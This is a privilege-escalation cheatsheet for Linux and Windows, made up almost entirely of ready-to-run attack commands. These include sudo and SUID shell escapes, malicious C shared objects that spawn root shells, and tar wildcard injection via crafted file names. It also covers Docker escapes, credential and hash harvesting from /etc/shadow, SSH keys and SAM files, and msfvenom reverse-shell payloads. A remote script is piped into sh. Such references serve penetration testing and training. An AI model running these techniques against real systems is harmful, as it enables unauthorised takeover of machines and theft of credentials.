Privilege Escalation Cheatsheet
Quick reference for Linux and Windows privilege escalation techniques.
Linux Privilege Escalation
Initial Enumeration
System Information
# Who am I?
whoami
id
# Hostname and kernel
hostname
uname -a
cat /proc/version
cat /etc/issue
# Architecture
lscpu
# Running processes
ps aux
ps aux | grep root
User Enumeration
# Current user privileges
sudo -l
# List users
cat /etc/passwd
cat /etc/passwd | cut -d: -f1
# Password hashes (if readable)
cat /etc/shadow
# Groups
cat /etc/group
# Command history
history
cat ~/.bash_history
Network Enumeration
# IP address
ifconfig
ip a
# Routes
ip route
route -n
# ARP table
arp -a
ip neigh
# Open ports
netstat -ano
ss -tulpn
# Active connections
netstat -antup
Password Hunting
# Search for passwords
grep --color=auto -rnw '/' -ie "PASSWORD=" 2>/dev/null
grep --color=auto -rnw '/' -ie "PASS=" 2>/dev/null
# Find password files
locate password | more
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
# SSH keys
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
# Config files
find / -name "*.conf" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
Automated Tools
# LinPEAS (note: this pipes an unreviewed remote script straight into sh)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# linux-exploit-suggester
./linux-exploit-suggester.sh
# pspy (process monitoring)
./pspy64
Kernel Exploits
# Check kernel version
uname -r
uname -a
# Search for exploits
searchsploit linux kernel <version>
searchsploit linux kernel 4.4
# Common kernel exploits
# Dirty COW (CVE-2016-5195) - Linux < 4.8.3
# DirtyCred (CVE-2022-2588)
Sudo Abuse
Check Sudo Permissions
sudo -l
GTFOBins Exploitation
# vim
sudo vim -c ':!/bin/sh'
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# find
sudo find . -exec /bin/sh \; -quit
# less/more
sudo less /etc/passwd
!/bin/sh
# nmap (old versions)
sudo nmap --interactive
!sh
# python
sudo python -c 'import os; os.system("/bin/sh")'
# perl
sudo perl -e 'exec "/bin/sh";'
# ruby
sudo ruby -e 'exec "/bin/sh"'
LD_PRELOAD
# If sudo -l shows: env_keep+=LD_PRELOAD
# Create malicious shared object:
# shell.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile and execute
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_program>
Sudo CVEs
# CVE-2019-14287 (sudo < 1.8.28)
sudo -u#-1 /bin/bash
# Baron Samedit CVE-2021-3156 (sudo 1.8.2-1.8.31p2, 1.9.0-1.9.5p1)
# Use exploit from GitHub
SUID Binaries
Find SUID Binaries
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Exploitation
# Check GTFOBins for SUID exploitation
# base64
./base64 /etc/shadow | base64 -d
# cp
./cp /etc/passwd /tmp/passwd
# modify and copy back
# find
./find . -exec /bin/sh -p \; -quit
# vim
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
Shared Object Injection
# Find SUID binary dependencies
strace /path/to/suid-binary 2>&1 | grep -i -E "open|access|no such file"
# If it tries to load a missing .so from a directory that is writable:
# Create malicious .so
# libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -fPIC libcalc.c -o /path/to/libcalc.so
Capabilities
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities
# cap_setuid+ep - can change UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Cron Jobs
# System cron
cat /etc/crontab
ls -la /etc/cron.*
# User cron
crontab -l
# Look for:
# - Writable scripts
# - Writable paths in scripts
# - Wildcard injection opportunities
# Wildcard injection (tar)
# If cron runs: tar czf /tmp/backup.tar.gz *
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
NFS Root Squashing
# Check NFS exports
cat /etc/exports
showmount -e <target>
# If no_root_squash is set:
# Mount on attacker machine
mkdir /tmp/nfs
mount -o rw <target>:/share /tmp/nfs
# Create SUID binary
cp /bin/bash /tmp/nfs/bash
chmod +s /tmp/nfs/bash
# On target
/share/bash -p
Docker Escape
# Check whether running inside a Docker container
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv
# If the current user is in the docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# If the Docker socket (docker.sock) is accessible
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh
PATH Hijacking
# If a SUID binary calls commands without a full path:
# 1. Create malicious binary
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
# 2. Prepend PATH
export PATH=/tmp:$PATH
# 3. Run SUID binary
Windows Privilege Escalation
Initial Enumeration
System Information
systeminfo
hostname
whoami
whoami /priv
whoami /groups
net user
net user <username>
net localgroup
net localgroup administrators
Network Enumeration
ipconfig /all
route print
arp -a
netstat -ano
Process/Service Enumeration
tasklist /SVC
sc query
wmic service list brief
Find Passwords
findstr /si password *.txt *.ini *.config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Automated Tools
# WinPEAS
.\winPEAS.exe
# PowerUp
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
# windows-exploit-suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt
# Seatbelt
.\Seatbelt.exe -group=all
Service Exploits
Unquoted Service Paths
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
# If the path is: C:\Program Files\Some Service\service.exe
# Drop malicious exe at: C:\Program.exe or C:\Program Files\Some.exe
Weak Service Permissions
# Check service permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv <username> *
# If the user has SERVICE_CHANGE_CONFIG on the service:
sc config <service> binpath= "C:\temp\shell.exe"
sc stop <service>
sc start <service>
DLL Hijacking
# Find DLL search order issues
# Use Process Monitor to find missing DLLs
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > evil.dll
Token Impersonation
Check Privileges
whoami /priv
SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
# Potato attacks
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t *
# PrintSpoofer (Windows 10/Server 2019)
.\PrintSpoofer.exe -i -c cmd
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
Registry Exploits
AlwaysInstallElevated
# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both keys are set to 0x1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi
msiexec /quiet /qn /i shell.msi
AutoRun
# Check autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check if writable
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program"
Saved Credentials
# List saved credentials
cmdkey /list
# RunAs with saved creds
runas /savecred /user:admin C:\temp\shell.exe
SAM/SYSTEM Dump
# If these files are readable:
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
# Or backup locations:
C:\Windows\Repair\SAM
C:\Windows\Repair\SYSTEM
# Extract hashes
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Kernel Exploits
# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Common exploits
# MS16-032 (Secondary Logon Handle)
# MS17-010 (EternalBlue)